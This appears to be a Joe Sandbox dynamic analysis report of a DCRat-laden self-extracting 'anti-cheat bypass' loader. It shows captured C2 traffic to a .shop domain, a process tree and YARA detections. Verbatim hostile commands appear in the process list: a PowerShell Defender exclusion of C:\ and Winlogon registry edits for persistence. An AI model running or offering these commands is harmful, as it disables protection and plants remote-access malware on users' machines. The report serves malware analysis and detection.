73 8d b6 fe ca 9a a3 Data Ascii: `5zoYB 9]~8WhFTyc?7ZNbjtA"x(E\]\3y#iz x$aq3}.8u6W;JPnlJNVDR>x^zg0vz40h9!SCrql-N\|?f-;"^(9nn}W.hKdYuJ_p 6f3.[e7;Ns
2024-06-23 04:54:24 UTC	812	IN	HTTP/1.1 200 OK Date: Sun, 23 Jun 2024 04:54:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=opmnsgvvff6jri991ia0324vab; expires=Wed, 16-Oct-2024 22:41:02 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0URh9lQJDcvHIIu5A1md4QCF%2FvX%2BTAkuomdCIqLZIXcFG4A5IyG%2FexnhveA873T0NlJ3o4KepdlMyx%2BciFCQAh9Ft5lf9OYRIMvbkoXEjWW2W91tokmvdzT3WUkaVHRM64ZWKTz%2Bfw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8981e136ed0c8c45-EWR alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49749	104.21.90.18	443	6960	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-23 04:54:24 UTC	268	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 92 Host: backcreammykiel.shop
2024-06-23 04:54:24 UTC	92	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 40 51 75 64 65 74 74 65 26 6a 3d 64 65 66 61 75 6c 74 26 68 77 69 64 3d 35 34 36 32 31 44 42 36 36 39 30 33 31 43 32 31 32 36 42 41 37 36 46 38 38 41 33 35 44 41 45 42 Data Ascii: act=get_message&ver=4.0&lid=LPnhqo--@Qudette&j=default&hwid=54621DB669031C2126BA76F88A35DAEB
2024-06-23 04:54:25 UTC	808	IN	HTTP/1.1 200 OK Date: Sun, 23 Jun 2024 04:54:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=kokbpffrkq4s2u644l59ija07t; expires=Wed, 16-Oct-2024 22:41:04 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d1dOMDn7X4VrA%2FGmGXWXm5Pbq6onsCPjQopJSIxfWcRvXyhD7hy5mRW7SxuDd%2Fno63O74mqQzEPDBOOV7IUtALRY7qav%2FZ9IvKICvYZnXgfq38xep4eXIiYj5AqfHjLJpKW85upTUg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8981e1462ad01865-EWR alt-svc: h3=":443"; ma=86400
2024-06-23 04:54:25 UTC	54	IN	Data Raw: 33 30 0d 0a 31 49 67 45 75 35 42 2b 52 7a 37 67 62 38 7a 78 6f 59 66 45 34 56 47 34 4d 46 2b 6f 34 46 47 49 6c 4a 30 30 4d 39 6e 4e 64 52 53 50 31 51 3d 3d 0d 0a Data Ascii: 301IgEu5B+Rz7gb8zxoYfE4VG4MF+o4FGIlJ00M9nNdRSP1Q==
2024-06-23 04:54:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	00:53:58
Start date:	23/06/2024
Path:	C:\Users\user\Desktop\bFZYRLnRIz.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\bFZYRLnRIz.exe"
Imagebase:	0x7ff716110000
File size:	1'939'559 bytes
MD5 hash:	289F27E7A02F8E76EBF39D2C0C3F09E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	00:53:59
Start date:	23/06/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Loader\AntiCheatBypass.bat" "
Imagebase:	0x7ff7fb170000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	00:53:59
Start date:	23/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	00:53:59
Start date:	23/06/2024
Path:	C:\Windows\System32\cacls.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
Imagebase:	0x7ff72e9e0000
File size:	34'304 bytes
MD5 hash:	A353590E06C976809F14906746109758
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	00:53:59
Start date:	23/06/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /K C:\Users\user\AppData\Local\Temp\Loader\AntiCheatBypasss.bat
Imagebase:	0x7ff7fb170000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	00:53:59
Start date:	23/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	00:53:59
Start date:	23/06/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command Add-MpPreference -ExclusionPath 'C:\'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	00:54:02
Start date:	23/06/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff693ab0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	00:54:03
Start date:	23/06/2024
Path:	C:\Windows\System32\choice.exe
Wow64 process (32bit):	false
Commandline:	choice /c y /n /t 10 /d y
Imagebase:	0x7ff6c4840000
File size:	35'840 bytes
MD5 hash:	1A9804F0C374283B094E9E55DC5EE128
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	00:54:13
Start date:	23/06/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\WINDOWS\system32\userinit.exe, C:\Users\skeet\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe" /f
Imagebase:	0x7ff6aa990000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	00:54:13
Start date:	23/06/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d "C:\WINDOWS\system32\explorer.exe, C:\ProgramData\SoftwareDistribution\572stuOQ0pZG2Xj.exe" /f
Imagebase:	0x7ff6aa990000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	00:54:13
Start date:	23/06/2024
Path:	C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe
Imagebase:	0x7ff64d320000
File size:	1'257'951 bytes
MD5 hash:	43AF303E1F32CE8C477ABBFB07887EA2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000B.00000003.1818779277.0000021DBAF50000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 71%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	00:54:13
Start date:	23/06/2024
Path:	C:\Users\user\AppData\Local\Temp\Loader\Loader.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\Loader\Loader.exe
Imagebase:	0x9b0000
File size:	608'296 bytes
MD5 hash:	B6C3C00D7CF6D8D13F20DBC590A675AD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 39%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	00:54:13
Start date:	23/06/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xf50000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	00:54:13
Start date:	23/06/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Loader\vO7REz65fRBWcJa.vbs"
Imagebase:	0x7ff626120000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	00:54:13
Start date:	23/06/2024
Path:	C:\ProgramData\SoftwareDistribution\Bypass.exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\SoftwareDistribution\Bypass.exe"
Imagebase:	0x7f0000
File size:	1'848'832 bytes
MD5 hash:	93E99FB34AC2CD9D6E867E24DCAFB2AB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 0000000F.00000002.4119735415.0000000005AB7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 0000000F.00000002.4119735415.0000000005D5F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 0000000F.00000002.4119735415.0000000005BF2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 0000000F.00000002.4119735415.0000000005BC7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 0000000F.00000002.4119735415.0000000005AD8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 0000000F.00000002.4119735415.0000000005DB5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000F.00000002.4119735415.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 0000000F.00000002.4119735415.0000000005C73000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 0000000F.00000002.4119735415.0000000005D8A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 0000000F.00000002.4119735415.0000000005C1D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 0000000F.00000002.4119735415.0000000005CC8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000F.00000000.1821021197.00000000007F2000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\ProgramData\SoftwareDistribution\Bypass.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\ProgramData\SoftwareDistribution\Bypass.exe, Author: Joe Security Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\ProgramData\SoftwareDistribution\Bypass.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 79%, ReversingLabs
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	11.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	27.1%
Total number of Nodes:	2000
Total number of Limit Nodes:	23

Executed Functions

Function 00007FF71613B190 Relevance: 123.9, APIs: 60, Strings: 10, Instructions: 1421windowfilesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF71611255C: GetDlgItem.USER32 ref: 00007FF7161125AC
Part of subcall function 00007FF71611255C: SetDlgItemTextW.USER32 ref: 00007FF7161125C8

EndDialog.USER32 ref: 00007FF71613B2D0
SetDlgItemTextW.USER32 ref: 00007FF71613B320
GetMessageW.USER32 ref: 00007FF71613B350
IsDialogMessageW.USER32 ref: 00007FF71613B369
TranslateMessage.USER32 ref: 00007FF71613B37B
DispatchMessageW.USER32 ref: 00007FF71613B389
EndDialog.USER32 ref: 00007FF71613B3D3
GetDlgItem.USER32 ref: 00007FF71613B410
IsDlgButtonChecked.USER32 ref: 00007FF71613B431
IsDlgButtonChecked.USER32 ref: 00007FF71613B449
SetFocus.USER32 ref: 00007FF71613B452
GetLastError.KERNEL32 ref: 00007FF71613B634
GetLastError.KERNEL32 ref: 00007FF71613B665
GetTickCount.KERNEL32 ref: 00007FF71613B68B
GetLastError.KERNEL32 ref: 00007FF71613B6F5
GetCommandLineW.KERNEL32 ref: 00007FF71613B841
CreateFileMappingW.KERNEL32 ref: 00007FF71613B900
MapViewOfFile.KERNEL32 ref: 00007FF71613B923
Sleep.KERNEL32 ref: 00007FF71613B9B6
UnmapViewOfFile.KERNEL32 ref: 00007FF71613B9DF
CloseHandle.KERNEL32 ref: 00007FF71613B9E8
SetDlgItemTextW.USER32 ref: 00007FF71613BCDE
DialogBoxParamW.USER32 ref: 00007FF71613C0D7
EndDialog.USER32 ref: 00007FF71613C0EF
EnableWindow.USER32 ref: 00007FF71613C2A6
IsDlgButtonChecked.USER32 ref: 00007FF71613C2F8
ShellExecuteExW.SHELL32 ref: 00007FF71613B95B

Part of subcall function 00007FF71612AAE0: LoadStringW.USER32 ref: 00007FF71612AB67
Part of subcall function 00007FF71612AAE0: LoadStringW.USER32 ref: 00007FF71612AB80

IsDlgButtonChecked.USER32 ref: 00007FF71613BEC3
SendDlgItemMessageW.USER32 ref: 00007FF71613BEEA
GetDlgItem.USER32 ref: 00007FF71613BEF8
IsDlgButtonChecked.USER32 ref: 00007FF71613BF12
GetDlgItem.USER32 ref: 00007FF71613BF4F
SetDlgItemTextW.USER32 ref: 00007FF71613BFEC
SetDlgItemTextW.USER32 ref: 00007FF71613C004
SetDlgItemTextW.USER32 ref: 00007FF71613C321
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71613C363
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71613C369
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71613C36F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71613C375
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71613C37B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71613C381
SendDlgItemMessageW.USER32 ref: 00007FF71613C449
EndDialog.USER32 ref: 00007FF71613C463
GetDlgItem.USER32 ref: 00007FF71613C491
SetFocus.USER32 ref: 00007FF71613C49A
SendDlgItemMessageW.USER32 ref: 00007FF71613C53E
FindFirstFileW.KERNEL32 ref: 00007FF71613C562
FindClose.KERNEL32 ref: 00007FF71613C68A
SendDlgItemMessageW.USER32 ref: 00007FF71613C7AF

Part of subcall function 00007FF71611129C: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF716111396

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71613CAA9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71613CAAF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71613CAB5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71613CABB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71613CAC1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71613CAC7

Strings

LICENSEDLG, xrefs: 00007FF71613C0C9
p, xrefs: 00007FF71613B7AB
@, xrefs: 00007FF71613B7B6
REPLACEFILEDLG, xrefs: 00007FF71613C3D3
-el -s2 "-d%s" "-sp%s", xrefs: 00007FF71613B799
STARTDLG, xrefs: 00007FF71613B1CA
winrarsfxmappingfile.tmp, xrefs: 00007FF71613B8E0
__tmp_rar_sfx_access_check_, xrefs: 00007FF71613B6A9
runas, xrefs: 00007FF71613B7C9
%s %s, xrefs: 00007FF71613C6D9, 00007FF71613C946

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: Item$_invalid_parameter_noinfo_noreturn$Message$DialogText$ButtonChecked$FileSend$ErrorLast$CloseFindFocusLoadStringView$CommandConcurrency::cancel_current_taskCountCreateDispatchEnableExecuteFirstHandleLineMappingParamShellSleepTickTranslateUnmapWindow
String ID: %s %s$-el -s2 "-d%s" "-sp%s"$@$LICENSEDLG$REPLACEFILEDLG$STARTDLG$__tmp_rar_sfx_access_check_$p$runas$winrarsfxmappingfile.tmp
API String ID: 3303814210-2702805183
Opcode ID: fd1327b765be3828c368324082e4329336840963213b892e7af7f095c4632b2e
Instruction ID: 5263927cca3d500f2aa2cc2f208f0a39e79f4dd4f9f2f221cf9fd04237e28f12
Opcode Fuzzy Hash: fd1327b765be3828c368324082e4329336840963213b892e7af7f095c4632b2e
Instruction Fuzzy Hash: DFD27262A08E8281FA10BB25FC552BBE361AF957B0FD04535D94E066A5EF3CE54CE720

Function 00007FF71613CE88 Relevance: 65.0, APIs: 26, Strings: 10, Instructions: 1963fileCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 00007FF71613D5F3
IsDlgButtonChecked.USER32 ref: 00007FF71613D626
IsDlgButtonChecked.USER32 ref: 00007FF71613D655
MoveFileW.KERNEL32 ref: 00007FF71613DB4B
MoveFileExW.KERNEL32 ref: 00007FF71613DB69
GetTempPathW.KERNEL32 ref: 00007FF71613DC49

Part of subcall function 00007FF716111FA0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF716111FFB

EndDialog.USER32 ref: 00007FF71613DFCA
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF71613EEE3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71613EEEF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71613EF07
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71613EF0D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71613EF13
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71613EF19
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71613EF1F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71613EF25
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71613EF2B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71613EF31
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71613EF37
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71613EF3D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71613EF43
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71613EF49
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71613EF4F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71613EF55
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71613EF5B
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF71613EF67
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF71613EF73

Strings

ProgramFilesDir, xrefs: 00007FF71613D4F0
HIDE, xrefs: 00007FF71613E9E5, 00007FF71613E9F4
lnk, xrefs: 00007FF71613E3CA, 00007FF71613E3D9
MAX, xrefs: 00007FF71613EA82, 00007FF71613EA91
@set:user, xrefs: 00007FF71613DD96, 00007FF71613DDA5
Software\Microsoft\Windows\CurrentVersion, xrefs: 00007FF71613D501
MIN, xrefs: 00007FF71613EAE5, 00007FF71613EAF4
<br>, xrefs: 00007FF71613D6DA, 00007FF71613D6E9
.tmp, xrefs: 00007FF71613DA85
.lnk, xrefs: 00007FF71613E406, 00007FF71613E415

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task$ButtonCheckedFileMove$DialogItemPathTemp
String ID: .lnk$.tmp$<br>$@set:user$HIDE$MAX$MIN$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$lnk
API String ID: 1830998149-3916287355
Opcode ID: 06592828c2cb139cfb98e04b1855bf5a4071a7d5fc2591e20ae39260eb37534a
Instruction ID: 76ae443d412061ee63db40aaf57f3ac2d110d678b7ff17dfc5d12c50329fa223
Opcode Fuzzy Hash: 06592828c2cb139cfb98e04b1855bf5a4071a7d5fc2591e20ae39260eb37534a
Instruction Fuzzy Hash: 79137172A04F8285FB10AB74EC402EEA7B1EB443B8FD04536DA1E57A99DF38D589D350

Function 00007FF716140754 Relevance: 45.9, APIs: 21, Strings: 5, Instructions: 380
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF71612DFD0: GetModuleHandleW.KERNEL32(?,?,?,00000000,?), ref: 00007FF71612E018
Part of subcall function 00007FF71612DFD0: GetProcAddress.KERNEL32(?,?,?,00000000,?), ref: 00007FF71612E030
Part of subcall function 00007FF71612DFD0: GetProcAddress.KERNEL32(?,?,?,00000000,?), ref: 00007FF71612E05D

Part of subcall function 00007FF7161262DC: GetCurrentDirectoryW.KERNEL32 ref: 00007FF7161262F2
Part of subcall function 00007FF7161262DC: GetCurrentDirectoryW.KERNEL32 ref: 00007FF71612632C

Part of subcall function 00007FF71613946C: OleInitialize.OLE32 ref: 00007FF716139486
Part of subcall function 00007FF71613946C: SHGetMalloc.SHELL32 ref: 00007FF7161394D4

GetCommandLineW.KERNEL32 ref: 00007FF71614096E
OpenFileMappingW.KERNEL32 ref: 00007FF716140A07
MapViewOfFile.KERNEL32 ref: 00007FF716140A30
UnmapViewOfFile.KERNEL32 ref: 00007FF716140A46
MapViewOfFile.KERNEL32 ref: 00007FF716140A63
UnmapViewOfFile.KERNEL32 ref: 00007FF716140ACA
CloseHandle.KERNEL32 ref: 00007FF716140AD3
SetEnvironmentVariableW.KERNELBASE ref: 00007FF716140BAD
GetLocalTime.KERNEL32 ref: 00007FF716140BB8
swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF716140C13
SetEnvironmentVariableW.KERNEL32 ref: 00007FF716140C26
GetModuleHandleW.KERNEL32 ref: 00007FF716140C2E
LoadIconW.USER32 ref: 00007FF716140C4D
DialogBoxParamW.USER32 ref: 00007FF716140CB6
Sleep.KERNEL32 ref: 00007FF716140CE6
DeleteObject.GDI32 ref: 00007FF716140D0D
DeleteObject.GDI32 ref: 00007FF716140D1F
CloseHandle.KERNEL32 ref: 00007FF716140D67
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF716140DD7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF716140DDD
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF716140DE3

Part of subcall function 00007FF71613FD0C: SetEnvironmentVariableW.KERNEL32 ref: 00007FF71613FD43
Part of subcall function 00007FF71613FD0C: SetEnvironmentVariableW.KERNEL32 ref: 00007FF71613FDBC

Strings

sfxname, xrefs: 00007FF716140B9B
%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 00007FF716140C02
STARTDLG, xrefs: 00007FF716140CA5
winrarsfxmappingfile.tmp, xrefs: 00007FF7161409F9
sfxstime, xrefs: 00007FF716140C1F

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
